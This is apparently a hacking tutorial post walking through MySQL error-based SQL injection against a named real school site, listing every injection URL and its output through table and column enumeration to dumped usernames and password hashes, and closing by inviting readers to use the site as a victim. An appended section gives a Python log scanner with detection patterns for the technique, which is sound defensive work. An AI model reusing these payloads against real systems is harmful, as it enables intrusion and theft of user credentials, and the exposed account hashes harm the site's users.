Exploiting the "planet kidz" site with MySQL error-based injection


[ Error-Based SQL Injection ]

target: http://www.planetkidz.co.id/matara1/news_home.php?no_id=29
author: X'1N73CT

[ test ]

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29'
result:
1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''29''' at line 1

this is the error I like best, because we can bypass it through Hackbar without wearing ourselves out with ORDER BY

[ finding the number of columns ]

if the error looks like that, we can bypass it using the GROUP BY command,
with Hackbar of course

click SQL => union select statement => type 50 or 100 or more heheheh => enter
then replace union select with group by so it becomes

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29 group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--

the site stays normal, so there are two possibilities: either there are more than 50 columns or the admin has protected it
we make sure by adding a ' and +-
so it becomes

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--+-

result:
1054 : Unknown column '7' in 'group statement'
this means column 7 doesn't exist, so there are only 6 columns

[ finding the injection number ]

by replacing the group by command with union select followed by the number of columns found earlier
so it becomes:

http://www.planetkidz.co.id/matara1/news_home.php?no_id=-29' union select 1,2,3,4,5,6--+-

result:
1222 : The used SELECT statements have a different number of columns

remember the XPath injection tutorial for handling this?
but sometimes a site has the extractvalue() command we use in XPath disabled
well, the solution is error-based
(SQLi that makes use of the error) ^_^

let's get straight to it

[ finding the version ]

with the command

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1

so it becomes
http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--+-

result:
1062 : Duplicate entry '5.0.96-community:1' for key 1
ok we got the version, let's continue

[ finding tables ]
we open it with the command

and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

so it becomes:

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'calendar_cat <~1' for key 1

to find the other tables, change the limit 0,1 command to limit 1,1, then limit 2,1 and so on
http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'calendar_events <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'calendar_param <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'calendar_users <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 4,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'msy_berita <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'msy_userprofile <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 6,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'new_ortu <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 7,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'nilai_siswa <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 8,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'sekolah <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 9,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'siswa <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(table_name as char),0x203c7e)) from information_schema.tables where table_schema=database() limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
the site goes back to normal, wow, so the results are only the ones above ^_^ ok let's open the columns ^_^

let's continue

[ opening columns ]
the way to open the columns is by adding the command below
and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
0x6d73795f7573657270726f66696c65 <~ hex of msy_userprofile
so it becomes:
http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'ProfileID <~1' for key 1

again we play with limit to see the column names ^_^

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'DateCreated <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'LastLogin <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'Username <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 4,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'Password <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'Name <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(column_name as char),0x203c7e)) from information_schema.columns where table_name=0x6d73795f7573657270726f66696c65 limit 6,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'Address <~1' for key 1

and so on

[ opening column data ]
let's try to open the data in the username and password columns
with the command

and (select 1 from(select count(*),concat((select(select concat(cast(concat(Username,0x3a,Password) as char),0x203c7e)) from msy_userprofile limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

so it becomes

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(concat(Username,0x3a,Password) as char),0x203c7e)) from msy_userprofile limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'admin:827ccb0eea8a706c4c34a16891f84e7b <~1' for key 1
hohoho xixi got it hehehehehe

let's continue, we play with limit ^_^
http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(concat(Username,0x3a,Password) as char),0x203c7e)) from msy_userprofile limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'suwar:827ccb0eea8a706c4c34a16891f84e7b <~1' for key 1

http://www.planetkidz.co.id/matara1/news_home.php?no_id=29' and (select 1 from(select count(*),concat((select(select concat(cast(concat(Username,0x3a,Password) as char),0x203c7e)) from msy_userprofile limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-
result:
1062 : Duplicate entry 'riri:86ae0211818cfc618f8c84433a433467 <~1' for key 1

and so on :)
that's the end of the tutorial from me, hope it's useful

greetings from me
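As an added example, not part of the original post, here is the defender-side counterpart to the version and table-enumeration steps above: a Python check that parses web-server access-log lines, percent-decodes the request, and flags the signatures of this technique (the floor(rand(0)*2) GROUP BY key, HAVING MIN(0), information_schema lookups, and a quote-terminated clause ending in a comment). The log lines, client IP and timestamps are constructed for the example, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Request-level signatures of the MySQL error-based technique used in the post:
# a GROUP BY key built from floor(rand(0)*2) (forces "Duplicate entry"), the
# HAVING MIN(0) variant, information_schema enumeration, and a quote-terminated
# clause that ends in a comment. Each pattern is checked on the decoded request.
SIGNATURES = {
    "rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "having_min": re.compile(r"having\s+min\s*\(\s*0\s*\)"),
    "info_schema": re.compile(r"information_schema\.(tables|columns)"),
    "count_star_group": re.compile(r"count\s*\(\s*\*\s*\).*group\s+by"),
    "quote_comment": re.compile(r"'\s*(or|and|group|union)\b.*--"),
}

# Apache/nginx combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def normalize_request(path: str) -> str:
    """Percent-decode, unwrap MySQL /*!...*/ version comments, collapse whitespace."""
    decoded = unquote_plus(path)
    decoded = re.sub(r"/\*!\s*(.*?)\s*\*/", r"\1", decoded)
    return re.sub(r"\s+", " ", decoded).lower()

def detect(line: str):
    """Return {'ip','status','hits'} for a log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = normalize_request(m["path"])
    hits = [name for name, rx in SIGNATURES.items() if rx.search(req)]
    return {"ip": m["ip"], "status": m["status"], "hits": hits}

# Constructed sample lines (hypothetical client IP and timestamps, no real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2013:14:02:11 +0700] "GET /matara1/news_home.php?no_id=29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2013:14:02:40 +0700] "GET /matara1/news_home.php?no_id=29%27%20or%201%20group%20by%20concat_ws(0x3a,version(),floor(rand(0)*2))%20having%20min(0)%20or%201--+- HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2013:14:03:05 +0700] "GET /matara1/news_home.php?no_id=29%27%20and%20(select%201%20from(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x203c7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+- HTTP/1.1" 200 298 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return (ip, status, hits) only for lines that matched at least one signature."""
    return [(r["ip"], r["status"], r["hits"]) for r in map(detect, lines) if r and r["hits"]]

if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE_LOG):
        print(f"{ip} status={status} indicators={','.join(hits)}")
```

Note that the injected requests here still return status 200 because the page prints the MySQL error inside a normal response, so status-code alerting alone would miss them; matching on the decoded query string is what catches this pattern.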

X'1N73CT

feel free to use these as tutorial victims :v

